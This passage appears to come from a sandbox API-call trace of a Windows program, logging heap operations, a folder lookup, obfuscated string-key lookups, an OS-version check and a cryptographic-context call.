| out: hHeap=0x2af0000) returned 1 [0209.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0209.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0209.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0209.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0209.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0209.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0209.119] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/Camera Roll", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Camera Roll", cAlternateFileName="CAMERA~1")) returned 0x9e2078 [0209.119] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0209.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0209.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0209.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.120] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0209.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0209.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0209.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0209.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0209.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0209.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0209.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0209.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0209.120] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.120] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0209.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0209.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0209.121] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.121] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0209.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0209.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0209.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0209.121] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0209.121] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.121] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0209.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.121] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0209.121] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0209.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0209.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0209.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0209.121] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0209.122] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0209.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0209.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0209.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0209.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0209.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.122] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.122] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0209.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0209.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0209.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0209.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.123] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.123] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.123] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0209.123] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.123] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0209.123] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.123] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.123] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.123] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.123] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.123] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.123] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0209.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0209.123] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.123] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.123] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0209.124] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.124] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0209.124] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0209.124] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0209.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ee0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0209.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0209.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6e80, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0209.124] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7bc48) returned 1 [0209.125] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.125] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.125] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0209.125] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.125] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0209.125] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.125] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.125] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.125] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.125] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.125] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.125] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0209.125] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.125] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0209.125] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.125] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.125] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.125] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.125] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.125] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.126] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.126] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0209.126] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.126] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0209.126] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.126] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.126] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.126] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.126] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.126] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.126] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.126] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0209.126] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.126] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0209.126] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.126] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.126] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.126] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.126] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.126] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.126] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.126] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.126] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.127] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0209.127] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.127] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0209.127] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.127] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.128] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.128] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.128] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.128] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.128] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.128] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) 